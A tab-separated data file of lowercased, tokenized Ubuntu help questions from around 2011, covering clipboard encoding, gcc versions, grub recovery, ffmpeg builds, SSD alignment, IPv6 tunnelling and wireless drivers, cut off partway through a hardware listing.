/home/ak/café/norrth-america.jpg the path copied from posterazor and pasted into chromium and then copied from chromium and pasted back into posterazor : the clipboard contents after copying that from chromium : $ xclip -out -selection clipboard -target targets timestamp targets multiple save_targets compound_text string text utf8_string text/plain $ xclip -out -selection clipboard -target string | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 c3 a9 2f 6e |/home/ak/caf../n| 00000010 6f 72 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 |orrth-america.jp| 00000020 67 |g| 00000021 $ xclip -out -selection clipboard -target utf8_string | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 c3 a9 2f 6e |/home/ak/caf../n| 00000010 6f 72 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 |orrth-america.jp| 00000020 67 |g| 00000021 $ xclip -out -selection clipboard -target text/plain | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 c3 a9 2f 6e |/home/ak/caf../n| 00000010 6f 72 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 |orrth-america.jp| 00000020 67 |g| 00000021 the path copied from posterazor and pasted into gnome terminal : the path copied from posterazor and pasted into gnome terminal and then copied from gnome terminal and pasted back into posterazor : the clipboard contents after copying that from gnome terminal : $ xclip -out -selection clipboard -target targets timestamp targets multiple save_targets utf8_string compound_text text string text/plain ; charset=utf-8 text/plain $ xclip -out -selection clipboard -target string | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 e9 2f 6e 6f |/home/ak/caf./no| 00000010 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 67 |rth-america.jpg| 0000001f $ xclip -out -selection clipboard -target utf8_string | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 c3 a9 2f 6e |/home/ak/caf../n| 00000010 6f 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 67 |orth-america.jpg| 00000020 $ xclip -out -selection clipboard -target 'text/plain ' | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 5c 75 30 30 |/home/ak/caf\u00| 00000010 65 39 2f 6e 6f 72 74 68 2d 61 6d 65 72 69 63 61 |e9/north-america| 00000020 2e 6a 70 67 |.jpg| 00000024 $ xclip -out -selection clipboard -target 'text/plain ; charset=utf-8 ' | hexdump -c 00000000 2f 68 6f 6d 65 2f 61 6b 2f 63 61 66 c3 a9 2f 6e |/home/ak/caf../n| 00000010 6f 72 74 68 2d 61 6d 65 72 69 63 61 2e 6a 70 67 |orth-america.jpg| 00000020
50294	does ubuntu ever push new versions of gcc into the package repository between releases ?	current version of gcc in ubuntu 11.04 is 4.5.2 . for certain c++0x features , i need gcc version 4.6 , but would like to avoid compiling from source . is there hope that ubuntu will update gcc in the package repository before the next release in october ( 11.10 ) . this question asks a similar thing except for an earlier version of ubuntu and gcc . a second part of the question , if the answer is `` no '' to the first , then can i hope to see it appear in ubuntu 's unstable repository ?
50296	how to use rdp protocol in remote desktop viewer ?	i am using a natty live-usb , and the remote desktop viewer application ( applications - > internet - > remote desktop viewer ) only shows ssh & vnc protocols . how can i include rdp in the list , in order to connect to existing windows remote desktop sessions on windows xp machines . i am aware that i can use the gnome-rdp application , or even rdesktop hostname from a terminal , but i would like to create a persistent liveusb that uses remote desktop viewer to connect to windows rdp ( port 3389 ) . i do not want to set up vnc , teamviewer or any others , as these do not solve my problem due to the fact they need additional software on the remote hosts .
50303	how can i get ubuntu to run smoother ?	i am relatively new to ubuntu [ i 've used it before and loved it but one day i just randomly could n't connect to the internet anymore so i switched back to windows ... also netflix does n't work in ubuntu ... ] and i 've noticed that when i used it before everything ran very smoothly and the window animations and stuff like that were just beautiful . now though , everything is choppy and just ugly really . i wan na say its because i was using an older kernel but i really do n't know . anyway , i guess my point is , how can i get it to look pretty again ? i really do wish i could be more descriptive but ... yeah ... i 'm on maverick btw . if anymore information is required i will happily oblige , just let me know . i was told to post this ... seems like a bit much and idk if it helps but here goes : pci ( sysfs ) knuckles-laptop description : computer width : 32 bits *-core description : motherboard physical id : 0 *-memory description : system memory physical id : 0 size : 1884mib *-cpu product : amd athlon ( tm ) 64 x2 dual-core processor tk-57 vendor : advanced micro devices [ amd ] physical id : 1 bus info : cpu @ 0 version : 15.8.2 size : 800mhz capacity : 800mhz width : 64 bits capabilities : fpu fpu_exception wp vme de pse tsc msr pae mce cx8 apic mtrr pge mca cmov pat pse36 clflush mmx fxsr sse sse2 ht syscall nx mmxext fxsr_opt rdtscp x86-64 3dnowext 3dnow extd_apicid pni cx16 lahf_lm cmp_legacy svm extapic cr8_legacy 3dnowprefetch lbrv cpufreq *-cache:0 description : l1 cache physical id : 0 size : 128kib *-cache:1 description : l2 cache physical id : 1 size : 256kib *-pci:0 description : host bridge product : rs690 host bridge vendor : ati technologies inc physical id : 100 bus info : pci @ 0000:00:00.0 version : 00 width : 32 bits clock : 66mhz configuration : latency=64 *-pci:0 description : pci bridge product : rs690 pci to pci bridge ( internal gfx ) vendor : ati technologies inc physical id : 1 bus info : pci @ 0000:00:01.0 version : 00 width : 32 bits clock : 66mhz capabilities : pci normal_decode bus_master cap_list resources : ioport : e000 ( size=4096 ) memory : fe900000-feafffff ioport : e0000000 ( size=268435456 ) *-display description : vga compatible controller product : rs690m [ radeon x1200 series ] vendor : ati technologies inc physical id : 5 bus info : pci @ 0000:01:05.0 version : 00 width : 64 bits clock : 33mhz capabilities : vga_controller bus_master cap_list rom configuration : driver=radeon latency=64 resources : irq:19 memory : e0000000-efffffff memory : fe9f0000-fe9fffff ioport : ee00 ( size=256 ) memory : fea00000-feafffff *-multimedia description : audio device product : radeon x1200 series audio controller vendor : ati technologies inc physical id : 5.2 bus info : pci @ 0000:01:05.2 version : 00 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=hda intel latency=64 resources : irq:19 memory : fe9ec000-fe9effff *-pci:1 description : pci bridge product : rs690 pci to pci bridge ( pci express port 1 ) vendor : ati technologies inc physical id : 5 bus info : pci @ 0000:00:05.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:40 memory : fe800000-fe8fffff *-network description : wireless interface product : bcm4312 802.11b/g lp-phy vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 logical name : eth1 version : 01 serial : 00:23:4e:36:6b : b9 width : 64 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=wl0 driverversion=5.60.48.36 ip=192.168.1.101 latency=0 multicast=yes wireless=ieee 802.11 resources : irq:17 memory : fe8fc000-fe8fffff *-pci:2 description : pci bridge product : rs690 pci to pci bridge ( pci express port 2 ) vendor : ati technologies inc physical id : 6 bus info : pci @ 0000:00:06.0 version : 00 width : 32 bits clock : 33mhz capabilities : pci normal_decode bus_master cap_list configuration : driver=pcieport resources : irq:41 ioport : d000 ( size=4096 ) memory : fe600000-fe7fffff ioport : f0000000 ( size=2097152 ) *-storage description : sata controller product : sb600 non-raid-5 sata vendor : ati technologies inc physical id : 12 bus info : pci @ 0000:00:12.0 version : 00 width : 32 bits clock : 66mhz capabilities : storage ahci_1.0 bus_master cap_list configuration : driver=ahci latency=64 resources : irq:22 ioport:6eb0 ( size=8 ) ioport:6eb8 ( size=4 ) ioport:6ec0 ( size=8 ) ioport:6ec8 ( size=4 ) ioport:6ee0 ( size=16 ) memory:80000000-800003ff *-usb:0 description : usb controller product : sb600 usb ( ohci0 ) vendor : ati technologies inc physical id : 13 bus info : pci @ 0000:00:13.0 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:16 memory : ffb00000-ffb00fff *-usb:1 description : usb controller product : sb600 usb ( ohci1 ) vendor : ati technologies inc physical id : 13.1 bus info : pci @ 0000:00:13.1 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:17 memory : ffb01000-ffb01fff *-usb:2 description : usb controller product : sb600 usb ( ohci2 ) vendor : ati technologies inc physical id : 13.2 bus info : pci @ 0000:00:13.2 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:18 memory : ffb02000-ffb02fff *-usb:3 description : usb controller product : sb600 usb ( ohci3 ) vendor : ati technologies inc physical id : 13.3 bus info : pci @ 0000:00:13.3 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:17 memory : ffb03000-ffb03fff *-usb:4 description : usb controller product : sb600 usb ( ohci4 ) vendor : ati technologies inc physical id : 13.4 bus info : pci @ 0000:00:13.4 version : 00 width : 32 bits clock : 66mhz capabilities : ohci bus_master configuration : driver=ohci_hcd latency=64 resources : irq:18 memory : ffb04000-ffb04fff *-usb:5 description : usb controller product : sb600 usb controller ( ehci ) vendor : ati technologies inc physical id : 13.5 bus info : pci @ 0000:00:13.5 version : 00 width : 32 bits clock : 66mhz capabilities : ehci bus_master cap_list configuration : driver=ehci_hcd latency=64 resources : irq:20 memory : ffa80000-ffa800ff *-serial description : smbus product : sbx00 smbus controller vendor : ati technologies inc physical id : 14 bus info : pci @ 0000:00:14.0 version : 14 width : 32 bits clock : 66mhz capabilities : cap_list configuration : driver=piix4_smbus latency=0 resources : irq:0 ioport:10c0 ( size=16 ) *-ide description : ide interface product : sb600 ide vendor : ati technologies inc physical id : 14.1 bus info : pci @ 0000:00:14.1 logical name : scsi0 version : 00 width : 32 bits clock : 66mhz capabilities : ide bus_master emulated configuration : driver=pata_atiixp latency=64 resources : irq:16 ioport:1f0 ( size=8 ) ioport:3f6 ioport:170 ( size=8 ) ioport:376 ioport : bfa0 ( size=16 ) *-cdrom description : dvd-ram writer product : dvd+-rw ts-l632h vendor : tsstcorp physical id : 0.0.0 bus info : scsi @ 0:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/scd0 logical name : /dev/sr0 version : d400 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=nodisc *-multimedia description : audio device product : sbx00 azalia ( intel hda ) vendor : ati technologies inc physical id : 14.2 bus info : pci @ 0000:00:14.2 version : 00 width : 64 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=hda intel latency=64 resources : irq:16 memory : febfc000-febfffff *-isa description : isa bridge product : sb600 pci to lpc bridge vendor : ati technologies inc physical id : 14.3 bus info : pci @ 0000:00:14.3 version : 00 width : 32 bits clock : 66mhz capabilities : isa bus_master configuration : latency=0 *-pci:3 description : pci bridge product : sbx00 pci to pci bridge vendor : ati technologies inc physical id : 14.4 bus info : pci @ 0000:00:14.4 version : 00 width : 32 bits clock : 66mhz capabilities : pci subtractive_decode bus_master resources : ioport : c000 ( size=4096 ) memory : fe500000-fe5fffff *-network description : ethernet interface product : rtl-8139/8139c/8139c+ vendor : realtek semiconductor co. , ltd. physical id : 7 bus info : pci @ 0000:03:07.0 logical name : eth0 version : 10 serial : 00:23 : ae:03:37 : c5 width : 32 bits clock : 33mhz capabilities : bus_master cap_list ethernet physical configuration : broadcast=yes driver=8139too driverversion=0.9.28 latency=64 maxlatency=64 mingnt=32 multicast=yes resources : irq:20 ioport : ce00 ( size=256 ) memory : fe5ff300-fe5ff3ff *-firewire description : firewire ( ieee 1394 ) product : r5c832 ieee 1394 controller vendor : ricoh co ltd physical id : 9 bus info : pci @ 0000:03:09.0 version : 05 width : 32 bits clock : 33mhz capabilities : ohci bus_master cap_list configuration : driver=firewire_ohci latency=64 maxlatency=4 mingnt=2 resources : irq:23 memory : fe5ff800-fe5fffff *-generic:0 description : sd host controller product : r5c822 sd/sdio/mmc/ms/mspro host adapter vendor : ricoh co ltd physical id : 9.1 bus info : pci @ 0000:03:09.1 version : 22 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=sdhci-pci latency=64 resources : irq:22 memory : fe5ff400-fe5ff4ff *-generic:1 unclaimed description : system peripheral product : r5c592 memory stick bus host adapter vendor : ricoh co ltd physical id : 9.2 bus info : pci @ 0000:03:09.2 version : 12 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : latency=64 resources : memory : fe5ff600-fe5ff6ff *-generic:2 description : system peripheral product : xd-picture card controller vendor : ricoh co ltd physical id : 9.3 bus info : pci @ 0000:03:09.3 version : 12 width : 32 bits clock : 33mhz capabilities : bus_master cap_list configuration : driver=r852 latency=64 resources : irq:22 memory : fe5ff700-fe5ff7ff *-pci:1 description : host bridge product : k8 [ athlon64/opteron ] hypertransport technology configuration vendor : advanced micro devices [ amd ] physical id : 101 bus info : pci @ 0000:00:18.0 version : 00 width : 32 bits clock : 33mhz *-pci:2 description : host bridge product : k8 [ athlon64/opteron ] address map vendor : advanced micro devices [ amd ] physical id : 102 bus info : pci @ 0000:00:18.1 version : 00 width : 32 bits clock : 33mhz *-pci:3 description : host bridge product : k8 [ athlon64/opteron ] dram controller vendor : advanced micro devices [ amd ] physical id : 103 bus info : pci @ 0000:00:18.2 version : 00 width : 32 bits clock : 33mhz *-pci:4 description : host bridge product : k8 [ athlon64/opteron ] miscellaneous control vendor : advanced micro devices [ amd ] physical id : 104 bus info : pci @ 0000:00:18.3 version : 00 width : 32 bits clock : 33mhz configuration : driver=k8temp resources : irq:0 *-scsi physical id : 1 bus info : scsi @ 4 logical name : scsi4 capabilities : scsi-host configuration : driver=usb-storage
50308	what is the default swap size ?	how does the installer calculate what size of swap partition to create ? presumably it 's based on installed ram size , but does that depend on how much ram ?
50309	is there a way to get team fortress 2 working ?	team fortress 2 is now free to play ! is there an easy way to get a copy working on ubuntu natty ?
50311	error while compiling ffmpeg during make	i want to install ffmpeg on ubuntu . and following this article http : //pasindudps.blogspot.com/2010/12/compiling-ffmpeg-in-ubuntu-1010.html but when m doing make after config then go to the ffmpeg folder . cd ffmpeg start the installation ./configure -- enable-gpl -- enable-version3 -- enable-nonfree -- enable-postproc \ -- enable-libfaac -- enable-libmp3lame -- enable-libopencore-amrnb \ -- enable-libopencore-amrwb -- enable-libtheora -- enable-libvorbis \ -- enable-libvpx -- enable-libx264 -- enable-libxvid -- enable-x11grab make giving this error /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_norm_shift' /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_lps_range' /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_norm_shift' /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_mlps_state' /home/reach121/ffmpeg/libavcodec/x86/cabac.h:93 : undefined reference to `ff_h264_norm_shift' collect2 : ld returned 1 exit status make : *** [ ffmpeg_g ] error 1 please suggest why this error is coming and what to do to solve this problem
50312	is the gt430/gt520 enough for 1080p flash ?	update 1 : it seems that the gt520 is better at hd flash decoding that the gt430 . does anyone know if the gt520 is able to play 1080p video smoothly and if it can have 2 monitors connected to it at the same time for a larger desktop ? original : now that flash 10.3 is out for ubuntu which apparently has hardware acceleration , i just wanted to know if the gt430 graphics card would be enough to play 1080p flash files directly from the browser smoothly ?
50313	how to restore grub without re-installing the os ?	a friend of mine has a packard bell laptop that came with windows pre-installed . i installed ubuntu on it and it works fine , but everytime she tried to boot windows on it ( fortunately rarely ) it fails and the computer is unable to boot any os anymore . upon boot , the computer stops on a black screen with a grub rescue prompt . is there any way to restore grub without re-installing ubuntu ? ( preferably an easy way as i can not do it for her and she is not extremely computer literate ) also ( but less important ) , is there a way to configure grub ( or something else ) so that windows wo n't destroy it on every boot attempt ?
50314	wallpaper in each workspace and right-click problem	i wan na set 4 different wallpapers in my 4 workspaces by setting in ccms ( wallpaper plugin ) . it just only work if show_desktop ( gconf-editor- > apps/nautilus/preference ) is unchecked . but after that i can not right-click on my desktop anymore . is it possible to make wallpaper-plugin work without `` disable '' my desktop ?
50324	11.04 server does not boot after installation	have successfully finished the re-installation of 11.04 server ( single os ) , but when i reboot the text `` linux operating system ... '' is displayed and then it stops . previous test installation of 11.04 server on the same partitioning scheme booted properly . any idea of what 's going wrong ? i suspect that the reason is that the /boot/grub directory is missing on the / partition ( lvm ) . instead , it is located on the /boot partition . in the partiotion part i set the following manually ( lvms already exist ) /boot /dev/sda1/ ( ext2 , boot flag set ) / vg_ubuntu-lv_root ( ext4 ) swap vg_ubuntu-lv_swap ( swap ) /tmp vg_ubuntu-lv_tmp ( ext4 ) in the end of the installation i select grub to be installed on the mbr partition since it 's a single os ( have tried to place it on / but /dev/mapper/vg_ubuntu-lv_root does not work ) . br , johan
50329	waking from sleep	often it happens that i can not wake my computer from sleep , it just does not react and i must force restart . in power management is set to put display to sleep after 15 minutes and computer never . so i guess it can not wake display from sleep . does this happen to anyone else ?
50335	how do i get debuild to put the binary in /usr/bin ?	i have been recently trying to package a small python utility to put on my ppa and i 've almost got it to work , but i 'm having problems in making the package install the binary ( a chmod +x python script ) under /usr/bin . instead it installs under / . i have this directory structure - > http : //db.tt/0khiyql . my package makefile is like so : target=usr/bin/txtrevise make : chmod +x $ ( target ) install : cp -r $ ( target ) $ ( destdir ) i 've used $ ( destdir ) , as i understand it to place the file under the debian subdir when debuild is run . i have the txtrevise script , my executable , under usr/bin folder under the root of my package . i also have the makefile and usr/bin/textrevise in my tarball : txtrevise_1.1.original.tar.gz . however when i build this and look inside of the debian package , txtrevise is always at the root of the package instead of under usr/bin and will be installed to / instead of /usr/bin . how can i get debuild to put the script in the right place ? thanks . any help would be greatly appreciated . i 'm stumped .
50339	how to make a stop motion or time-lapse video with webcam ?	i have a webcam that works as a v4l2 device . what is the most convenient way to capture either a stop-motion or time-lapse video ? n.b . stop-motion and time-lapse are related but conceptually different . time-lapse is where you take a photo of a scene at a set interval and then combine it into a video ( that looks like it 's going really fast ) . stop-motion is where you control the scene and take an image for every change you make , to form an animation ( eg wallace and grommit ) . an application for time-lapse needs to be able to take a photo at a set interval .
50344	how to have two version of php installed and switch easily ?	i want to have both php 5.2.17 and php 5.3.5 installed on my ubuntu machine and switch as per my necessity . how can i achieve this ?
50352	can nagios3 automatically generate a network map ?	have just installed nagios3 onto ubuntu server 10.04 . a clean install . all plugins installed . the nagios status map only has localhost and gateway discovered . is there a way for it to scan our network , along with all windows servers , routers , etc ? i ca n't find any automated way to do this . our network is a large school network so manual configuration is difficult .
50354	not all updates can be installed warning when installing gnome 3	when installing gnome3 on natty , i got this at the update manager . all the items related to gnome can not be checked . i 'm also trying to install via command line , but the download speed of the dist-upgrade is really slow . what is the cause of the warning ? and how to handle it ?
50357	how to run a shell script when a new usb storage device is detected ?	i want a script that dumps the log and starts logging on it as soon as a usb mass storage is plugged ( with the file 'okdump ' on it ) .and if anything abnormal ( like a error that is visually present ) is detected i want it to take a screenshot and save it on the same drive .
50359	why is n't .profile sourced on login to lxde ?	i switched recently from gnome to lxde and since then my .profile file has n't been sourced on login . i found out that my path variable does n't include ~/bin anymore . however , my .profile file includes path= '' $ home/bin : $ path '' while path 's content is /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games . is it intended that lxde does n't read this file on login ? if yes , what file should i use to add the bin folder to the path variable ? if not , to what package should i report a bug ?
50361	cd box label designer	is there any good program for printing cd jewel case labels , which : automatically fetches the track titles from freedb or similar cdda database allows to customize layout ( background color , element placement , size of the images ) . on windows there is cdrlabel ( tried to run this using wine , but hangs during accessing the freedb ) . i 've already tried : kover , disc-over , glabel and cd-circleprint .
50369	how do i install firefox 3.6 ?	i need to install firefox 3.6 for plugin compatibility on ubuntu 11 , how do i install firefox 3.6 so that it replaces the default firefox install with this one ?
50371	will the cube plugin be available to use in ubuntu 11.10 ?	it is a feature that attract users to come to ubuntu , since it 's pretty and most important , efficient . any hopes it will be available to use in the next unity release 11.10 ?
50375	apply transparent background in gimp	how can you make remove the background and replace with transparency ( as represented by checkered background in ps ) ? is there any limitations in the file type i can export the image to ?
50378	external usb hard drive is not being seen anymore	i think my problem is a little different than several other similar titled questions . everything started while i was using 10.10 . external drive was always recognized and mounted , but the timing of this differed . i mean when i booted , the os sometimes saw the drive immediately , sometimes after a few minutes , sometimes after hours . although this was annoying , i tolerated this somehow . then this problem persisted after i upgraded to 11.04 with a clean install . afterwards , the drive became totally invisible to the os . it is not even detected as an usb device anymore . however , there is one thing i can do to make it seen . if i boot to another operating system which can detect the drive , and then boot back to ubuntu , everything is perfect . but this is of course very impractical . to summarize , the usb drive is recognized by ubuntu if and only if another os in the same computer could recognize it first . i should also say i have not had any problems with the same drive in any other os or a different computer . my drive is philips with a hitachi hdd inside , has its own power source and any other usb powered drives have never caused this kind of a problem . i 've tried almost all recommendations in similar topics but none of them seems to be related to this one . what can i possibly do to fix this ?
50389	can you still install ubuntu 10.10 with wubi ?	i am trying to help a friend get set up with ubuntu and want to recommend wubi for his install ( he is not very computer savvy ) . i had recently tried the wubi download from ubuntu.com and the only option it gave me was to install natty . is there any way i can get wubi to install 10.10 maverick ? preferably just the exe file , not having to download an entire disc image as the friend has no idea how to burn discs . thanks much !
50390	driver for integrated display on lenovo 420s core i7	i am looking for the drivers for integrated display on lenovo 420s core i7 . this computer has the nvidia optimus option . can anyone point me in the right direction ?
50391	mouse event programmer	i 'm playing a little hack and slash game where i have to continuously click left mouse button to hit , i 'm wondering if there is an application to programme mouse 's key and for example , keep pressed the mouse button and compute it as several clicks , not as being kept pressed . any suggestion ? thanks ! !
50397	how can i refresh/reinstall/clear/set-to-default my bootup process ?	i 'm currently having a problem with my bootup process that is growing progressively worse as time goes on : while booting , it does a few minutes of hard-drive reading . during that , instead of showing a boot splash screen , it shows various dashes and dots , as if the video card is n't recognizing . the splash screen actually has colors similar to the splash screen ( purple ) , it simply is garbled . it then does a few minutes of hard-drive reads , and if i leave it long enough , sometimes it boots into the desktop ( and auto-logs-in ) . sometimes , unfortunately , it just hangs on that garbled screen and reads from the hard-drive forever . notably , i 've also stopped being able to access grub during bootup ( perhaps it is just not displayed correctly by the video , hard to tell ) . this is a symptom that has grown over the course of various ubuntu upgrades , at least i suspect that the upgrade process is leaving behind cruft . so , is there a safe way for me to `` refresh '' the boot system so that it is clean , new , fast , and reliable ? for example , to test out a cleanly configured boot , make sure that it works ( try before i buy ) , and then apply it to the system to eliminate as much of this problem as possible ? here is the requested bootchart without the advantage of a packed boot : here is a bootchart with the advantage of a previously packed boot :
50402	how to limit the download speed of apt ?	i am downloading a very large package and my internet connection is n't the fastest , so browsing the web at the same time is a pain . how can i limit the bandwidth apt-get uses ?
50413	what affects the text color in google earth ?	the text color in google earth ( installed via google 's package ) has recently changed to become unreadable : it has n't always been this way , but i do n't know what i did that caused it to change . what settings are responsible for the text color in google earth ?
50417	how to record internet radio ?	in 10.04 it was easy to display icecast streams ; but whenever i click on the plugin nothing happens and no stream directory is loaded . the station recorder plugin seems to have disappeared also . if somenbody nows a fix thanx a lot .
50423	how do i log out of xorg ?	i need to troubleshoot a problem with suspend/resume . the debugging instructions say : make sure you 're logged out of xorg ( or run sleep.sh with `` force '' argument ) how do i log out of xorg ?
50424	how can i find and remove 6to4 from my system ?	last week i installed miredo and configured my system to handle ipv6 through 6to4 tunneling . it was easy and it worked well . so i decided i 'd give hurricane electric 's ipv6 connection a try . i 've had a lot to learn , and i thought i had it all running ( with a great deal of help from a very patient person at hurricane : my linksys e3200 did n't like ipv6 ) . but now , when all should be good , after i uninstalled miredo and teredo and whatever else , i find that there is `` 6to4 tunneling - another automatic tunneling , '' which i need to remove from my box . but i have no idea where or what it might be . connected to my computer are a couple printers , an external hard drive , and a router ( which has no settings for ipv6 ) . all of these are , i think , innocent in this matter . $ ifconfig eth0 link encap : ethernet hwaddr 00:21:9b:1c:26 : bb inet addr:192.168.1.104 bcast:192.168.1.255 mask:255.255.255.0 inet6 addr : 2002:42db : c22c:0:221:9bff : fe1c:26bb/64 scope : global inet6 addr : fe80 : :221:9bff : fe1c:26bb/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1427 errors:0 dropped:0 overruns:0 frame:0 tx packets:1342 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:1152240 ( 1.1 mb ) tx bytes:177497 ( 177.4 kb ) interrupt:20 memory : fdfc0000-fdfe0000 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:12 errors:0 dropped:0 overruns:0 frame:0 tx packets:12 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:720 ( 720.0 b ) tx bytes:720 ( 720.0 b ) $ ip -6 route show 2002:42db : c22c : :/64 dev eth0 proto kernel metric 256 expires 24sec fe80 : :/64 dev eth0 proto kernel metric 256 default via fe80 : :c2c1 : c0ff : fec6:3308 dev eth0 proto kernel metric 1024 expires 1794sec hoplimit 64 so , how can i get rid of 6to4 tunneling , when i do n't even know where it is ? is there someplace to look and find out what 's going on ? i 'm pretty new to linux and ubuntu . so it looks like miredo is n't running , yet i 'm getting ipv6 addresses in eth0 . it was that , i think , that a guy at hurricane electric was seeing and that caused him to see `` 6to4 tunneling - another automatic tunneling . '' is that just a feature of ubuntu ? he told me this : '' look for a machine that has 6to4 tunneling configured and announcing 6to4 prefix to your linux box . here 's the clue : according to your ipv6 route table , fe80 : :xxxx : xxxx : xxxx : xxxx is a link local address for your default gateway . can you check and see which device has a mac address of xx-xx-xx-xx-xx ? '' it turns out that the device with that mac address is my linksys router ! ( which has no ipv6 support ! ) i do n't understand that .
50426	setting execute permisions on a mounted image	how do you set execute permissions on a .exe that is on a mounted image ( .iso file ) ?
50428	how do i check whether partitions on my ssd are properly aligned ?	i just installed ubuntu on my new intel ssd . now i am not sure , whether paritions are properly aligned in respect to my specific ssd . here 's my fdisk output . $ fdisk -l platte /dev/sda : 120.0 gbyte , 120034123776 byte 255 köpfe , 63 sektoren/spur , 14593 zylinder einheiten = zylinder von 16065 × 512 = 8225280 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0x000a6294 gerät boot . anfang ende blöcke id system /dev/sda1 * 1 1913 15360000 83 linux /dev/sda2 1913 14058 97558528 83 linux /dev/sda3 14058 14594 4300800 82 linux swap / solaris also , do i still need to align my ssd at all , since i am using trim on the ext4 partitions by mounting them with the discard flag . if it is the case , that my partitions are not properly aligned , what could i do to fix this without having to reinstall everything ?
50429	ubuntu usb boot failure	when trying to boot from a boot usb drive i got the message , `` vesamenu.c32 : not a com32r image . '' i was trying to boot a fairly new toshiba laptop with a ubuntu 10.04.2 lts created usb boot . i re-created the usb drive with 11.04 and it booted fine . these were both 32 bit versions even though the laptop is a 64 bit . i was trying to create a generic boot usb that would work on everything i might try it on . what is the consensus on this idea ? any solution to the above error ? thanks from a noobe .
50433	how to convert .mkv file into .mp4 file losslessly ?	i need to convert a video file from matroska container into mp4 container . matroska file contains one h.264 video track and one ac3 sound track . it should be possible to do this losslessly , but how to do it with native ubuntu tools ? transcoding is not an option .
50435	is it possible to use ubuntu one with webdav ?	is it possible to use ubuntu one with webdav ? in the connect to server option . i did n't find a solution .
50437	running steam for tf2 - vm or wine ?	i 'm installing steam on my virtual machine as well as installing on my ubuntu 10.10 . which do you think will run better ?
50439	wireless not working with bcm4311	i recently installed 11.04 ( and its crap compared to 10.x , but its free so meh.. ) , anyway , i am still a bit of a noob , and can not get the wireless to work . i am using a dell inspiron 6400 . i have attempted to follow the instructions here : http : //ubuntuforums.org/showthread.php ? t=779754 & highlight=wireless+work+hardy and here http : //ubuntuforums.org/showthread.php ? t=769990 . but when i type in sudo ifconfig wlan0 up , it says wlan0 : error while getting interface flags : no such device . normally my wifi light would come on if i press fn + f2 , but even that does not happen now . lspci produces the following : 00:00.0 host bridge : intel corporation mobile 945gm/pm/gms , 943/940gml and 945gt express memory controller hub ( rev 03 ) 00:02.0 vga compatible controller : intel corporation mobile 945gm/gms , 943/940gml express integrated graphics controller ( rev 03 ) 00:02.1 display controller : intel corporation mobile 945gm/gms/gme , 943/940gml express integrated graphics controller ( rev 03 ) 00:1b.0 audio device : intel corporation n10/ich 7 family high definition audio controller ( rev 01 ) 00:1c.0 pci bridge : intel corporation n10/ich 7 family pci express port 1 ( rev 01 ) 00:1c.3 pci bridge : intel corporation n10/ich 7 family pci express port 4 ( rev 01 ) 00:1d.0 usb controller : intel corporation n10/ich 7 family usb uhci controller # 1 ( rev 01 ) 00:1d.1 usb controller : intel corporation n10/ich 7 family usb uhci controller # 2 ( rev 01 ) 00:1d.2 usb controller : intel corporation n10/ich 7 family usb uhci controller # 3 ( rev 01 ) 00:1d.3 usb controller : intel corporation n10/ich 7 family usb uhci controller # 4 ( rev 01 ) 00:1d.7 usb controller : intel corporation n10/ich 7 family usb2 ehci controller ( rev 01 ) 00:1e.0 pci bridge : intel corporation 82801 mobile pci bridge ( rev e1 ) 00:1f.0 isa bridge : intel corporation 82801gbm ( ich7-m ) lpc interface bridge ( rev 01 ) 00:1f.2 ide interface : intel corporation 82801gbm/ghm ( ich7 family ) sata ide controller ( rev 01 ) 00:1f.3 smbus : intel corporation n10/ich 7 family smbus controller ( rev 01 ) 03:00.0 ethernet controller : broadcom corporation bcm4401-b0 100base-tx ( rev 02 ) 03:01.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 03:01.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 03:01.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 03:01.3 system peripheral : ricoh co ltd xd-picture 